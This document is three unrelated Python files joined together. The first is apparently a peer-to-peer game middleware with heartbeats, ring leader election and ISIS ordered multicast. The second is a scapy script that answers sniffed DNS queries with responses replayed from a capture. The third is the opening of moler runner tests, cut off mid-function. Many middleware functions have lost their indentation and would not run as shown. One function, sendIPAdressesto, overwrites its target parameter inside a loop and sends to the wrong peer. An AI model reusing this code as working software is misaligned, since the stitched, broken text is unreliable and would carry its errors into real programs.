def __init__(self,UUID, statemashine):
    """Wire up all transport handlers, start the heartbeat thread and register
    the listeners implementing address exchange, voting and ISIS ordering."""
    Middleware.MY_UUID = UUID
    self.statemashine = statemashine
    self._broadcastHandler = BroadcastHandler()
    self._unicastHandler = UDPUnicastHandler()
    self._tcpUnicastHandler = TCPUnicastHandler()
    self.subscribeTCPUnicastListener(self._updateAdresses)
    self.subscribeTCPUnicastListener(self._checkForVotingAnnouncement)
    # Create Thread to send heartbeat
    self.sendHB = threading.Thread(target=self._sendHeartbeats)
    self.sendHB.start()
    Middleware.neighborAlive = False
    # Subscribe heartbeat handler to udp unicastlistener
    self.subscribeUnicastListener(self._listenHeartbeats)
    # Subscribe heartbeat lost player handler to tcp unicastlistener
    self.subscribeTCPUnicastListener(self._listenLostPlayer)
    # For Reliable Multicast with Total Ordering (ISIS algorithm)
    self.highestAgreedSequenceNumber = 0 # sequence Number for Total Ordering (ISIS Algorithm)
    self.highestbySelfProposedSeqNumber = 0
    self.subscribeTCPUnicastListener(self._responseFor_requestSequenceNumberForMessage)
    self.subscribeTCPUnicastListener(self._acceptOrderedMulticast)
    # per-instance middleware variables
    self._holdBackQueue = HoldBackQ()
    self.leaderUUID = ''
# INFO: This works
def findNeighbor(self, ownUUID, ipaddresses):
# only to be called if we don't yet have the neighbor
# make ordered dict - uuid remains dict key
ordered = sorted(ipaddresses.keys())
# if len(ordered)>0:
# print("\nsorted uuid dict:\t")
# print(ordered)
if ownUUID in ordered:
ownIndex = ordered.index(ownUUID)
uuidList = list(ordered)
# add neighbor with larger uuid as neighbor
if uuidList[ownIndex - 1] != ownUUID:
# another uuid exists and it's not our own
print("neighbor is\t")
print(uuidList[ownIndex - 1])
return uuidList[ownIndex - 1]
def _sendHeartbeats(self):
    """Heartbeat loop (runs in its own thread forever): ping the ring neighbor
    once per second; after 3 consecutive missed responses declare it dead,
    announce 'lostplayer' and - if the dead peer was the leader - start a new
    election."""
    ctr = 0   # consecutive missed-heartbeat counter
    while True:
        Middleware.neighborAlive = False
        if not Middleware.neighborUUID:
            # we don't yet have a neighbor --> find one
            Middleware.neighborUUID = self.findNeighbor(Middleware.MY_UUID, Middleware.ipAdresses)
            sleep(1)
        else:
            # we have a neighbor --> ping it
            self.sendMessageTo(Middleware.neighborUUID, 'hbping', Middleware.MY_UUID)
            sleep(1)
            if ctr < 3 and not Middleware.neighborAlive:
                ctr += 1
            elif not Middleware.neighborAlive and ctr >= 3:
                ctr = 0
                # update own ipAdresses
                Middleware.ipAdresses.pop(Middleware.neighborUUID, None)
                # send update to everyone else
                self.multicastReliable('lostplayer', Middleware.neighborUUID)
                # check if neighbor is leader
                if Middleware.neighborUUID == self.leaderUUID:
                    self.initiateVoting()
                Middleware.neighborUUID = None
            elif Middleware.neighborAlive:
                ctr = 0
            else:
                # should never get here. if we do: reset neighbor and counter
                Middleware.neighborUUID = None
                ctr = 0
def _listenHeartbeats(self, messengeruuid:str, command:str, data:str):
    """UDP listener: answer 'hbping' with 'hbresponse'; mark our neighbor
    alive when its response arrives."""
    if command == 'hbping':
        # respond with alive answer
        self.sendMessageTo(messengeruuid, 'hbresponse', Middleware.MY_UUID)
    elif command == 'hbresponse':
        # set flag alive - only responses from the current neighbor count
        if messengeruuid == Middleware.neighborUUID:
            Middleware.neighborAlive = True
def _listenLostPlayer(self, messengerUUID:str, clientsocket:socket.socket, command:str, data:str):
    """TCP listener: drop a reported dead peer (*data* = its uuid) from the
    address table and force a new neighbor lookup."""
    if command == 'lostplayer':
        # remove the lost host from the list and look for new neighbor
        Middleware.ipAdresses.pop(data, None)
        Middleware.neighborUUID = None
@classmethod
def addIpAdress(cls, uuid, addr):
    """Register peer *uuid* at *addr* (ip, port); resets the neighbor so the
    heartbeat loop re-evaluates the ring."""
    cls.ipAdresses[uuid] = addr
    Middleware.neighborUUID = None
def broadcastToAll(self, command:str, data:str=''):
    """UDP-broadcast 'command:data' to the whole subnet."""
    self._broadcastHandler.broadcast(command+':'+data)

def sendMessageTo(self, uuid:str, command:str, data:str=''): # unicast
    """Fire-and-forget UDP unicast of 'command:data' to peer *uuid*."""
    ipAdress = Middleware.ipAdresses[uuid]
    self._unicastHandler.sendMessage(ipAdress, command+':'+data)

def sendTcpMessageTo(self, uuid:str, command:str, data:str=''):
    """One-way TCP message 'command:data' to peer *uuid*."""
    addr = Middleware.ipAdresses[uuid]
    self._tcpUnicastHandler.sendMessage(addr, command+':'+data)

def sendTcpRequestTo(self, uuid:str, command:str, data:str=''):
    """Blocking TCP request 'command:data' to peer *uuid*; returns the reply string."""
    addr = Middleware.ipAdresses[uuid]
    return self._tcpUnicastHandler.sendTcpRequestTo(addr, command+':'+data)
def multicastReliable(self, command:str, data:str=''):
    """B-multicast 'command:data' over TCP to every known peer except ourselves."""
    message = command+':'+data
    for key, addr in Middleware.ipAdresses.items():
        if key != Middleware.MY_UUID:
            self._tcpUnicastHandler.sendMessage(addr, message)
def multicastOrderedReliable(self, command:str, message:str):
    """Totally-ordered reliable multicast over TCP (ISIS algorithm).

    Concurrently collects a proposed sequence number from every peer, picks
    the maximum as the agreed number and re-multicasts it with the payload.

    Args:
        command (str): application-level command name
        message (str): payload for the command (must not contain '$')
    """
    # https://cse.buffalo.edu/~stevko/courses/cse486/spring19/lectures/12-multicast2.pdf
    # https://cse.buffalo.edu/~stevko/courses/cse486/spring19/lectures/11-multicast1.pdf
    """ • Sender multicasts message to everyone
        • Reply with proposed priority (sequence no.)
        – Larger than all observed agreed priorities
        – Larger than any previously proposed (by self) priority
        • Store message in priority queue – Ordered by priority (proposed or agreed)
        – Mark message as undeliverable
        • Sender chooses agreed priority, re-multicasts message with agreed priority
        – Maximum of all proposed priorities
        • Upon receiving agreed (final) priority
        – Mark message as deliverable
        – Reorder the delivery queue based on the priorities
        – Deliver any deliverable messages at the front of priority queue
    """
    messageID = str(uuid.uuid4())
    # add to own holdbackQueue with our own proposal (undeliverable for now)
    ownPropodesSeqNum = max(self.highestbySelfProposedSeqNumber, self.highestAgreedSequenceNumber) +1
    self._holdBackQueue.append(OrderedMessage(ownPropodesSeqNum, '', '', messageID, Middleware.MY_UUID, False))
    self.highestbySelfProposedSeqNumber = ownPropodesSeqNum
    proposedSeqNumbers = []
    threadsList = []
    # make concurrent (multithreaded) proposal requests to all peers
    for key, addr in Middleware.ipAdresses.items():
        if key != Middleware.MY_UUID:
            t = threading.Thread(target = self._requestSeqNum, args = (addr,messageID, proposedSeqNumbers))
            t.start()
            threadsList.append(t)
    # wait for the requests to finish
    for t in threadsList:
        t.join()
    proposedSeqNumbers.append(ownPropodesSeqNum)
    # the agreed priority is the maximum of all proposals
    highestN = max(proposedSeqNumbers)
    self.highestAgreedSequenceNumber = max(highestN, self.highestAgreedSequenceNumber)
    self._holdBackQueue.updateData(messageID, highestN, command, message)
    self.multicastReliable('OrderedMulticast with agreed SeqNum', command+'$'+message+'$'+str(highestN)+'$'+messageID)
def _requestSeqNum(self, addr,messageID, returnsList:list):
command = 'requestSequenceNumberForMessage'
returnsList.append(int( self._tcpUnicastHandler.sendTcpRequestTo(addr,'requestSequenceNumberForMessage'+':'+messageID) ))
# self.subscribeTCPUnicastListener(self._responseFor_requestSequenceNumberForMessage) in middleware.__init__
def _responseFor_requestSequenceNumberForMessage(self, messengerUUID:str, clientsocket:socket.socket, command:str, messageID:str):
    """TCP listener (ISIS step 2): propose a sequence number for *messageID*,
    park the message as undeliverable and send the proposal back on the socket."""
    if command == 'requestSequenceNumberForMessage':
        # propose something larger than anything observed or previously proposed
        proposedSeqNum = max(self.highestbySelfProposedSeqNumber, self.highestAgreedSequenceNumber) +1
        self.highestbySelfProposedSeqNumber = proposedSeqNum
        self._holdBackQueue.append(OrderedMessage(proposedSeqNum, '', '', messageID, messengerUUID, False))
        clientsocket.send(str.encode(str(proposedSeqNum) ) )
        # socket gets closed after this returns
# self.subscribeTCPUnicastListener(self._acceptOrderedMulticast) in middleware.__init__
def _acceptOrderedMulticast(self, messengerUUID:str, clientsocket:socket.socket, command:str, data:str):
    """TCP listener (ISIS step 3): receive the agreed sequence number and mark
    the held-back message deliverable.

    Payload layout: '<command>$<message>$<agreedSeqNum>$<messageID>'.
    """
    if command == 'OrderedMulticast with agreed SeqNum':
        data = data.split('$')
        assert len(data) == 4, 'something went wrong with the spliting of the the data'
        messageCommand = data[0]
        messageData = data[1]
        messageSeqNum = int(data[2])
        messageID = data[3]
        self.highestAgreedSequenceNumber = max(self.highestAgreedSequenceNumber, messageSeqNum)
        self._holdBackQueue.updateData(messageID, messageSeqNum, messageCommand, messageData)
def sendIPAdressesto(self,uuid):
command='updateIpAdresses'
s=self.leaderUUID + '$'
for uuid, (addr,port) in Middleware.ipAdresses.items():
s += uuid+','+str(addr)+','+str(port)+'#'
self.sendTcpMessageTo(uuid,command,s)
def subscribeBroadcastListener(self, observer_func):
    """Register *observer_func(messengerUUID, command, data)* to be called for
    every received broadcast message."""
    self._broadcastHandler.subscribeBroadcastListener(observer_func)

def subscribeUnicastListener(self, observer_func):
    """Register *observer_func(messengerUUID, command, data)* to be called for
    every received UDP unicast message."""
    self._unicastHandler.subscribeUnicastListener(observer_func)

def subscribeTCPUnicastListener(self, observer_func):
    """Register *observer_func(messengerUUID, clientsocket, command, data)* to
    be called for every received TCP unicast message."""
    self._tcpUnicastHandler.subscribeTCPUnicastListener(observer_func)

def unSubscribeTCPUnicastListener(self, rmFunc):
    # remove a previously registered TCP listener
    self._tcpUnicastHandler.unSubscribeTCPUnicastListener(rmFunc)
@classmethod
def subscribeOrderedDeliveryQ(cls, observer_func):
    """Register *observer_func(messengerUUID, command, data)* to be called when
    a totally-ordered multicast message becomes deliverable."""
    cls.orderedReliableMulticast_ListenerList.append(observer_func)

@classmethod
def unSubscribeOrderedDeliveryQ(cls, rmFunc):
    # remove all occurrences of the function from the listener list
    cls.orderedReliableMulticast_ListenerList = [x for x in cls.orderedReliableMulticast_ListenerList if x != rmFunc]
def _updateAdresses(self, messengerUUID:str, clientsocket, command:str, data:str):
"""_updateAdresses recieves and decodes the IPAdresses List from the function
sendIPAdressesto(self,uuid)
Args:
command (str): if this argument NOT == 'updateIpAdresses' this function returns without doing anything
message (str): list of uuid's and IPAdresses
"""
if command == 'updateIpAdresses':
data = data.split('$')
self.leaderUUID = data[0]
secondArgument = data[1]
removedLastHashtag = secondArgument[0:-1] # everything, but the last character
for addr in removedLastHashtag.split('#'):
addrlist = addr.split(',')
self.addIpAdress(addrlist[0], (addrlist[1], int(addrlist[2])))
# uuid ipadress port of the unicastListener
def _checkForVotingAnnouncement(self, messengerUUID:str, clientsocket:socket.socket, command:str, data:str):
    """TCP listener implementing the ring-based leader election.

    'voting' messages carry a candidate uuid: forward the larger of (received,
    own) around the ring; when our own uuid comes back we won the election.
    'leaderElected' announces the winner to everyone.
    """
    if command == 'voting':
        # our own uuid came back around the ring - we are the leader
        if data == Middleware.MY_UUID:
            # i'm Simon
            print('\nI am the new Simon\n')
            # reliably multicast my UUID to all players
            self.multicastReliable('leaderElected', Middleware.MY_UUID)
            # set leaderUUID as my UUID
            self.leaderUUID = Middleware.MY_UUID
            # set GameState to simon_startNewRound
            # self.statemashine.switchStateTo('simon_startNewRound')
        # candidate is smaller - replace it with our own uuid and forward
        elif data < Middleware.MY_UUID:
            # send my UUID to neighbour
            command = 'voting'
            data = Middleware.MY_UUID
            self.sendTcpMessageTo(self.findLowerNeighbour(), command, data)
        # candidate is greater - forward it unchanged
        elif data > Middleware.MY_UUID:
            # send received UUID to neighbour
            command = 'voting'
            print('\nsend voting command with recevied UUID (' + data + ') to lowerNeighbour\n')
            self.sendTcpMessageTo(self.findLowerNeighbour(), command, data)
    elif command == 'leaderElected':
        print('new Leader got elected\n')
        self.leaderUUID = data
        # set GameState to state_player_waitGameStart_f
        #self.statemashine.switchStateTo('player_waitGameStart')
# call this function to start a new leader election
def initiateVoting(self):
    """Kick off a ring election by sending our own uuid as the 'voting'
    candidate to the lower neighbour."""
    # send to lowerNeighbour: voting with my UUID
    command = 'voting'
    data = Middleware.MY_UUID
    print('Initiate new Voting!\n')
    self.sendTcpMessageTo(self.findLowerNeighbour(), command, data)
def findLowerNeighbour(self):
ordered = sorted(self.ipAdresses.keys())
ownIndex = ordered.index(Middleware.MY_UUID)
neighbourUUID = ordered[ownIndex - 1]
assert Middleware.MY_UUID != neighbourUUID, 'I am my own neigbour that shouldnt happen'
print('Neighbour: ' + neighbourUUID)
return neighbourUUID
# send to next higher node we start a voting with my UUID
class UDPUnicastHandler():
    """Owns the UDP unicast socket: sends 'command:data' messages and runs a
    background thread that dispatches received messages to subscribers."""
    # port of the UDP listener socket (the TCP handler reuses the same number);
    # class-level so it is easily accessible from everywhere
    _serverPort = 0 # later changed in the init, it is here to define it as a class variable, so that it is accessable easyly

    def __init__(self):
        # Create a UDP socket (AF_INET = IPv4, SOCK_DGRAM = UDP)
        self._server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._server_socket.bind(('', 0)) # '' = local IP address, 0 = pick a random open port
        UDPUnicastHandler._serverPort = self._server_socket.getsockname()[1] # returns the previously selected (random) port
        self.incommingUnicastHistory = []
        self._listenerList = [] # observer pattern
        # Create Thread to listen to UDP unicast
        self._listen_UDP_Unicast_Thread = threading.Thread(target=self._listenUnicast)
        self._listen_UDP_Unicast_Thread.start()
def sendMessage(self, addr, message:str):
    """Send *message* to *addr* as a single datagram, prefixed with our uuid,
    ip and listener port ('uuid_ip_port_message')."""
    self._server_socket.sendto(str.encode(Middleware.MY_UUID + '_'+IP_ADRESS_OF_THIS_PC + '_'+str(UDPUnicastHandler._serverPort)+'_'+message), addr)
def _listenUnicast(self):
    """Receiver loop (runs in its own thread): parse incoming
    'uuid_ip_port_command:data' datagrams and notify every subscriber.

    recvfrom() blocks until a datagram arrives, which is why this loop lives
    in a dedicated thread.
    """
    while True:
        try:
            data, address = self._server_socket.recvfrom(BUFFER_SIZE)
            data = data.decode('utf-8')
            if data:
                data = data.split('_')
                messengerUUID = data[0]
                messengerIP = data[1]
                # the port the sender's unicast listener socket is bound to
                messengerPort = int(data[2])
                assert address == (messengerIP, messengerPort)
                message = data[3]
                messageSplit = message.split(':')
                assert len(messageSplit) == 2, "There should not be a ':' in the message"
                messageCommand = messageSplit[0]
                messageData = messageSplit[1]
                self.incommingUnicastHistory.append((message, address))
                for observer_func in self._listenerList:
                    observer_func(messengerUUID, messageCommand, messageData)
                # fixed: removed the pointless leftover 'data[1] = None'
        # fixed: a bare 'except:' also swallowed SystemExit/KeyboardInterrupt;
        # keep the best-effort behavior but only for real errors
        except Exception:
            print("Connection was lost!")
def subscribeUnicastListener(self, observer_func):
    # observer_func(messengerUUID, command, data) is called per received datagram
    self._listenerList.append(observer_func)
class TCPUnicastHandler():
    """Owns the TCP listener socket (bound to the same port number as the UDP
    handler) plus helpers for one-shot messages and blocking request/response
    exchanges."""
    # this class needs to be initiated after the unicast Handler
    def __init__(self):
        # Create a TCP socket for listening (AF_INET = IPv4, SOCK_STREAM = TCP)
        self._server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # '' = local IP address; reuse the UDP handler's port number - UDP and
        # TCP port namespaces are independent, so both can share the number
        self._server_socket.bind(('', UDPUnicastHandler._serverPort))
        self.incommingUnicastHistory = []
        self._listenerList = [] # observer pattern
        # Create Thread to listen to TCP unicast
        self._listen_UDP_Unicast_Thread = threading.Thread(target=self._listenTCPUnicast)
        self._listen_UDP_Unicast_Thread.start()
def sendMessage(self, addr: tuple, message:str): # open new connection; send message and close immediately
    """Fire-and-forget: send *message* to *addr* over a fresh TCP connection
    opened in a background thread."""
    threading.Thread(target = self._sendMessageThread, args = (addr,message)).start()

def _sendMessageThread(self, addr: tuple, message:str):
    # worker: connect, send 'uuid_ip_port_message', close; refusals are logged only
    sendSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # IPv4 / TCP
    sendSocket.bind(('', 0))
    try:
        sendSocket.connect(addr)
        messageBytes = str.encode(Middleware.MY_UUID + '_'+IP_ADRESS_OF_THIS_PC + '_'+str(UDPUnicastHandler._serverPort)+'_'+message)
        sendSocket.send(messageBytes)
    except ConnectionRefusedError:
        print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ERROR')
        print('Process on address ', addr, 'is not responding')
    finally:
        sendSocket.close() # Further sends are disallowed
    # ##### send data in chunks (kept for reference, currently unused)
    # totalsent = 0
    # while totalsent < MSGLEN:
    #     sent = self.sendSocket.send(messageBytes[totalsent:])
    #     if sent == 0:
    #         raise RuntimeError("socket connection broken")
    #     totalsent = totalsent + sent
    # ##### send data in chunks
def sendTcpRequestTo(self, addr:tuple, message:str):
# this is blocking
sendSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET means that this socket Internet Protocol v4 addresses
sendSocket.bind(('', 0))
response = None
try:
sendSocket.connect(addr)
messageBytes = str.encode(Middleware.MY_UUID + '_'+IP_ADRESS_OF_THIS_PC + '_'+str(UDPUnicastHandler._serverPort)+'_'+message)
sendSocket.send(messageBytes)
#print('TCPUnicastHandler: sent message: ', message,"\n\tto: ", addr)
response = sendSocket.recv(BUFFER_SIZE).decode('utf-8')
#print('TCPUnicastHandler: got response: ', response,"\n\tfrom: ", addr)
except ConnectionRefusedError:
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ERROR')
print('Process on address ', addr, 'is not connecting')
finally:
sendSocket.close() # close this socket
return response
def _listenTCPUnicast(self):
#print("listenTCP Unicast Thread has started and not blocked Progress (by running in the background)")
self._server_socket.listen(5) # The argument to listen tells the socket library that we want it to queue up as many as 5 connect requests (the normal max) before refusing outside connections.
#https://docs.python.org/3/howto/sockets.html
# https://github.com/TejasTidke/Socket-Programming-TCP-Multithreading/blob/master/server/multiserver.py
while True:
clientsocket, address = self._server_socket.accept()
#print("TCPUnicastHandler has accept() ed a connection")
clientsocket.settimeout(60)
# star a new thread, that is responsible for one new request from one peer.
# in this thread, they can exchange more messages
threading.Thread(target = self._listenToClient, args = (clientsocket,address)).start()
def _listenToClient(self, clientsocket:socket.socket, address):
data = clientsocket.recv(BUFFER_SIZE)
################# recieve data in chunks
# chunks = []
# bytes_recd = 0
# while bytes_recd < MSGLEN:
# chunk = clientsocket.recv(min(MSGLEN - bytes_recd, BUFFER_SIZE))
# if chunk == b'':
# raise RuntimeError("socket connection broken")
# chunks.append(chunk)
# bytes_recd = bytes_recd + len(chunk)
# data = b''.join(chunks)
################# recieve data in chunks
data = data.decode('utf-8')
if data:
data=data.split('_')
messengerUUID = data[0]
messengerIP = data[1]
messengerPort = int(data[2]) # this should be the port where the unicast listener socket
#(of the sender of this message) is listening on
#assert address == (messengerIP, messengerPort)
message=data[3]
messageSplit= message.split(':')
assert len(messageSplit) == 2, "There should not be a ':' in the message"
messageCommand = messageSplit[0]
messageData = messageSplit[1]
#print("TCP Message recieved;\n messageCommand \t :",messageCommand, "\n messageData \t :",messageData )
self.incommingUnicastHistory.append((message, address))
for observer_func in self._listenerList:
observer_func(messengerUUID, clientsocket, messageCommand, messageData)
# after the dedicated function has returned (, or no function wanted to deal with this request)
# the socket can be closed
clientsocket.close()
def subscribeTCPUnicastListener(self, observer_func):
self._listenerList.append(observer_func)
def unSubscribeTCPUnicastListener(self, rmFunc):
# remove all occurences of Function
self._listenerList = [x for x in self._listenerList if x != rmFunc]
class BroadcastHandler():
    """UDP broadcast send/receive with observer-pattern dispatch of incoming messages.

    Wire format of every message: "<uuid>_<ip>_<port>_<command>:<data>".
    """

    def __init__(self):
        self.incommingBroadcastHistory = []
        self._listenerList = []
        self._broadcast_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # UDP socket for listening
        self._listen_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # Set the socket to broadcast and enable reusing addresses
        self._listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        self._listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Bind socket to address and port
        self._listen_socket.bind((IP_ADRESS_OF_THIS_PC, BROADCAST_PORT))
        # Background thread that receives UDP broadcasts
        self._listen_UDP_Broadcast_Thread = threading.Thread(target=self._listenUdpBroadcast)
        self._listen_UDP_Broadcast_Thread.start()

    def broadcast(self, broadcast_message: str):
        """Send message to the broadcast port defined at launch of the program.

        Args:
            broadcast_message (str): needs to have the format "command:data"
                (the data could be csv encoded with , and #)
        """
        # the embedded port is where this process' unicast listener thread is listening
        payload = Middleware.MY_UUID + '_' + IP_ADRESS_OF_THIS_PC + '_' + str(UDPUnicastHandler._serverPort) + '_' + broadcast_message
        self._broadcast_socket.sendto(str.encode(payload, encoding='utf-8'), (BROADCAST_IP, BROADCAST_PORT))

    def subscribeBroadcastListener(self, observer_func):
        """Register a callback(messengerUUID, command, data) for incoming broadcasts."""
        self._listenerList.append(observer_func)

    def _listenUdpBroadcast(self):
        """Blocking receive loop - runs in its own thread so it never blocks the caller."""
        while True:
            # waits here until a datagram arrives on our port
            data, addr = self._listen_socket.recvfrom(BUFFER_SIZE)
            data = data.decode('utf-8')
            if not data:
                continue
            # BUGFIX: maxsplit=3 so underscores inside the command/data payload
            # are preserved (an unbounded split truncated the message at parts[3]).
            parts = data.split('_', 3)
            messengerUUID = parts[0]
            messengerIP = parts[1]
            messengerPort = int(parts[2])  # port where the sender's unicast listener socket listens
            message = parts[3]
            # record/refresh the sender's address (overrides an existing entry)
            Middleware.addIpAdress(messengerUUID, (messengerIP, messengerPort))
            if messengerUUID != Middleware.MY_UUID:  # ignore our own broadcasts
                # BUGFIX: maxsplit=1 so a ':' inside the data part no longer aborts with AssertionError
                messageSplit = message.split(':', 1)
                assert len(messageSplit) == 2, "Message must have the format 'command:data'"
                messageCommand = messageSplit[0]
                messageData = messageSplit[1]
                self.incommingBroadcastHistory.append((messengerUUID, message))
                for observer_func in self._listenerList:
                    observer_func(messengerUUID, messageCommand, messageData)
@dataclass(order=True)
class OrderedMessage:
    """Message queued for totally ordered multicast delivery.

    order=True generates comparison methods over ALL fields in declaration
    order, so messageSeqNum (the proposed/agreed priority) dominates the sort
    used by HoldBackQ; the remaining fields only break ties.
    """
    messageSeqNum: int  # proposed/agreed sequence number - the primary sort key
    messageCommand: str  # command part of the "command:data" payload
    messageData: str  # data part of the "command:data" payload
    messageID: str  # unique id used to locate the entry when the final priority arrives
    messengerUUID: str  # UUID of the original sender
    deliverable: bool  # True once the agreed (final) priority has been received
class HoldBackQ():
    """Hold-back queue for totally ordered (ISIS-style) multicast delivery.

    Messages wait here until their agreed (final) priority arrives; deliverable
    messages at the front of the priority order are handed to the registered
    ordered-reliable-multicast listeners and removed from the queue.
    """

    def __init__(self):
        self._queue = []

    def append(self, x: OrderedMessage):
        """Queue a new message, then deliver whatever became deliverable.

        Upon receiving the agreed (final) priority the protocol will:
        - mark the message as deliverable,
        - reorder the delivery queue based on the priorities,
        - deliver any deliverable messages at the front of the priority queue.
        """
        self._queue.append(x)
        self.checkForDeliverables()

    def updateData(self, messageID: str, messageSeqNum: int, messageCommand: str, messageData: str):
        """Attach the agreed priority/content to the entry with messageID and mark it deliverable."""
        for entry in self._queue:
            if entry.messageID != messageID:
                continue
            entry.messageSeqNum = messageSeqNum
            entry.messageCommand = messageCommand
            entry.messageData = messageData
            entry.deliverable = True
            break
        self.checkForDeliverables()

    def checkForDeliverables(self):
        """Deliver deliverable messages in priority order; stop at the first still-pending one."""
        for entry in sorted(self._queue):
            if not entry.deliverable:
                break
            for listener in Middleware.orderedReliableMulticast_ListenerList:
                listener(entry.messengerUUID, entry.messageCommand, entry.messageData)
            self._queue.remove(entry)
|
dns_server.py | #!/usr/bin/env python
import sys
import struct
import os
import threading
from scapy.all import *
from scapy.layers.inet import _IPOption_HDR
def get_if():
    """Return the first network interface whose name contains 'eth0'; exit(1) if none exists."""
    # single pass over the interface list (original called get_if_list() twice
    # and kept an unused copy in 'ifs')
    for i in get_if_list():
        if "eth0" in i:
            return i
    # print(...) with a single argument works identically in Python 2 and 3
    print("Cannot find eth0 interface")
    exit(1)
def handle_pkt(pkt, socket, r_pkt):
    """Log an incoming DNS query (UDP dport 53) and forward its pre-recorded response.

    'socket' keeps the original parameter name even though it shadows the module
    (callers pass positionally). r_pkt maps str(DNS id) + str(question) -> response packet.
    """
    if UDP in pkt and pkt[UDP].dport == 53:
        global r_num
        # BUGFIX: all four original branches printed the "st" suffix; use the
        # same st/nd/rd/th selection as pass_pkt() intended.
        suffix = {1: "st", 2: "nd", 3: "rd"}.get(r_num % 10, "th")
        print("Get %4d%s packet, id: %5d" % (r_num, suffix, pkt.getlayer(DNS).id))
        r_num += 1
        sys.stdout.flush()
        pass_pkt(pkt, r_pkt[str(pkt[DNS].id) + str(pkt.qd)], socket)
def pass_pkt(q, r, socket):
    """Build a response frame for query q from the pre-recorded response r and send it.

    'socket' keeps the original parameter name even though it shadows the module.
    """
    p = Ether(src=get_if_hwaddr(iface), dst="FF:FF:FF:FF:FF:FF")
    # swap the addressing: answer goes back to the querier's source port
    p = p / IP(dst=q[IP].src) / UDP(dport=q[UDP].sport, sport=53) / r.getlayer(DNS)
    global s_num
    # same output as the original st/nd/rd/th if/elif chain, without the duplication
    suffix = {1: "st", 2: "nd", 3: "rd"}.get(s_num % 10, "th")
    print("Send %4d%s packet, id: %5d" % (s_num, suffix, p.getlayer(DNS).id))
    s_num += 1
    sendp(p, iface=iface, verbose=False, socket=socket)
def distribute_thread(pkt, socket, r_pkt):
    """Handle each sniffed packet in its own daemon thread with a private snapshot of the response table."""
    tmp_pkt = dict(r_pkt)  # snapshot so concurrent handlers don't race on the shared dict
    t = threading.Thread(target=handle_pkt, args=(pkt, socket, tmp_pkt,))
    t.daemon = True  # setDaemon() is deprecated; assign the attribute instead
    t.start()
def main():
    """Load pre-recorded DNS responses and answer live queries sniffed on the first eth* interface."""
    # list() needed: in Python 3 filter() returns an iterator, which is not indexable
    ifaces = list(filter(lambda i: 'eth' in i, os.listdir('/sys/class/net/')))
    global iface
    iface = ifaces[0]
    print("iface: ", iface)
    socket = conf.L2socket(iface=iface)
    pcaps = rdpcap("dns0313_2_onlyDNS.pcapng")
    # index the recorded responses by DNS id + question section
    r_pkt = {}
    for pkt in pcaps:
        if pkt.qr == 1:  # the packet is a response
            r_pkt[str(pkt[DNS].id) + str(pkt.qd)] = pkt
    print("sniffing on %s" % iface)
    sys.stdout.flush()
    sniff(iface=iface,
          prn=lambda x: distribute_thread(x, socket, r_pkt))
if __name__ == '__main__':
    # Global packet counters read/incremented by pass_pkt() and handle_pkt() for progress logging.
    s_num = 0
    r_num = 0
    main()
|
py3test_runners.py | # -*- coding: utf-8 -*-
"""
Testing the connection observer runner API that should be fulfilled by any runner:
- submit
- wait_for
These integration tests check cooperation of the 3 players:
connection_observer - runner - connection
Main focus is on the runner and its correctness.
"""
__author__ = 'Grzegorz Latuszek'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com'
import re
import threading
import time
import platform
import importlib
import asyncio
import mock
import pytest
import contextlib
from moler.connection_observer import ConnectionObserver
from moler.util.loghelper import disabled_logging
# --------------------------------------------------------------------
# Testing data path from connection to connection observer
# Runner is involved in data path establishing/dropping/securing
# --------------------------------------------------------------------
@pytest.mark.asyncio
async def test_observer_gets_all_data_of_connection_after_it_is_submitted_to_background(observer_runner):
    """After runner.submit() returns, no connection data may be lost by the observer."""
    # in other words: after returning from runner.submit() no data can be lost, no races
    # Raw 'def' usage note:
    # This functionality works as well when runner is used inside raw def function
    # since it only uses runner.submit() + awaiting time
    # in other words - runner is running over some time period
    # The only difference is that raw def function may use only standalone_runner (which is subset of observer_runner)
    # and inside test you exchange 'await asyncio.sleep()' with 'time.sleep()'
    from moler.observable_connection import ObservableConnection
    with disabled_logging():
        durations = []
        for n in range(20):  # need to test multiple times to ensure there are no thread races
            moler_conn = ObservableConnection()
            net_down_detector = NetworkDownDetector(connection=moler_conn, runner=observer_runner)
            connection = net_down_detector.connection
            start_time = net_down_detector.start_time = time.time()
            observer_runner.submit(net_down_detector)
            durations.append(time.time() - start_time)
            # all three lines sent AFTER submit() must reach the observer
            connection.data_received("61 bytes")
            connection.data_received("62 bytes")
            connection.data_received("ping: Network is unreachable")
            assert net_down_detector.all_data_received == ["61 bytes", "62 bytes", "ping: Network is unreachable"]
        print("\n{}.submit() duration == {}".format(observer_runner.__class__.__name__,
                                                    float(sum(durations))/len(durations)))
def test_runner_secures_observer_against_additional_data_after_observer_is_done(observer_runner):
    """Done observer should not get data even before unsubscribe from moler-connection"""
    # correctly written observer looks like:
    #
    # def data_received(self, data):
    #     if not self.done():
    #         parse(data)
    #
    # This test checks if runners secure wrong-written-observers with missing 'if not self.done():'
    from moler.observable_connection import ObservableConnection
    with disabled_logging():
        for n in range(20):  # need to test multiple times to ensure there are no thread races
            moler_conn = ObservableConnection()
            net_down_detector = NetworkDownDetector(connection=moler_conn, runner=observer_runner)
            net_down_detector.start_time = time.time()  # must start observer lifetime before runner.submit()
            connection = net_down_detector.connection
            net_down_detector.start_time = time.time()
            observer_runner.submit(net_down_detector)
            connection.data_received("61 bytes")
            connection.data_received("ping: Network is unreachable")
            # "62 bytes" arrives after the detector is done - the runner must not forward it
            connection.data_received("62 bytes")
            assert net_down_detector.all_data_received == ["61 bytes", "ping: Network is unreachable"]
def test_runner_secures_observer_against_additional_data_after_runner_shutdown(observer_runner):
    """In-shutdown runner should not pass data to observer even before unsubscribe from moler-connection"""
    # Even without running background feeder
    # we can use correctly constructed secure_data_received(data)
    # to block passing data from connection to observer while runner is in-shutdown state
